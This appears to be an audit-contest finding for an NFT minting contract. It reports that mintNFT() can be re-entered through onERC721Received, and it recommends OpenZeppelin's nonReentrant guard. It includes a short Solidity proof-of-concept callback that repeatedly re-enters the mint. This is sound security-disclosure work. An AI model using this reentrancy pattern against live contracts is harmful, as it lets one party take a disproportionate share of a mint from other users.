NFT Dealers
First Flight #58
Beginner FriendlyFoundry
100 EXP
View all submissions
Previous Next
Submission Details
Impact: low
Likelihood: medium

Reentrancy in mintNFT() allows excessive single-transaction minting

Author Revealed upon completion

Root + Impact

mintNFT() is vulnerable to reentrancy via onERC721Received(), allowing a single user to mint multiple NFTs in a single transaction and bypass fair distribution.

Description

  • Normally, mintNFT() allows users to mint NFTs while respecting whitelist, reveal state, and supply limits, ensuring fair distribution among all participants.

  • The function calls _safeMint without reentrancy protection. When the receiver is a contract implementing onERC721Received(), it can reenter mintNFT() multiple times before the transaction completes, allowing one user to mint a large number of NFTs at once.

// Root cause in the codebase
function mintNFT() external payable onlyWhenRevealed onlyWhitelisted {
@> _safeMint(msg.sender, tokenId); // triggers onERC721Received → reentrancy possible
}

Risk

Likelihood: Medium

  • Any user deploying a contract with onERC721Received() can trigger multiple reentries during a single mint transaction.

Impact: Low

  • One user can mint a disproportionate amount or even all available NFTs in a single transaction.

  • Other users are disadvantaged or completely blocked from minting, violating fair distribution rules.

Proof of Concept

function onERC721Received(
address,
address,
uint256,
bytes calldata
) external returns (bytes4) {
if (canMintMore) {
target.mintNFT(); // reenter mintNFT multiple times
}
return this.onERC721Received.selector;
}

Recommended Mitigation

Add a reentrancy protection using OpenZeppelin’s ReentrancyGuard:

- function mintNFT() external payable onlyWhenRevealed onlyWhitelisted {
+ function mintNFT() external payable onlyWhenRevealed onlyWhitelisted nonReentrant {
_safeMint(msg.sender, tokenId);
}

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!